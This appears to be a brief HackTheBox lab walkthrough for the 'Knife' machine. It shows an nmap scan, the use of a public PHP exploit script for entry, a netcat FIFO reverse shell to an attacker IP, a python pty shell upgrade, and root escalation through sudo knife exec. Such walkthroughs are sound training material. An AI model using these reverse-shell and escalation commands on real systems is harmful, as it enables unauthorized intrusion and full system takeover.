HackTheBox : Knife Walkthrough
Step 1:
Let’s scan for open ports with Nmap
Command: nmap -A 10.10.10.242
Step 2:
I couldn’t find anything definitive from the port scan. Accordingly, let’s look at the traffic network with burp suite
Here we see the version of php. Now let’s find the appropriate exploit for this version.
Let’s look at the first
Now, let’s download this exploit and start the infiltration process.
Step 3:
Command: python3 49933.py
Good, we’re inside now.
Let’s look at who we are and all the files.
Command: whoami
Command: find
Let’s look inside this file.
Command: cat ./home/james/user.txt
Findout the user flag and submit to htb.
Get root
Let’s get in touch between the first target car and our own car
Command: rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc your ip1234 >/tmp/f
Create an interactive terminal with python
Command: python3 -c ‘import pty;pty.spawn(“/bin/bash”)’
Get root and find the flag
Command: sudo /usr/bin/knife exec — exec “exec ‘/bin/sh -i ’ ”
Get the root and find the flag
Findout the rootflag and submit to htb.
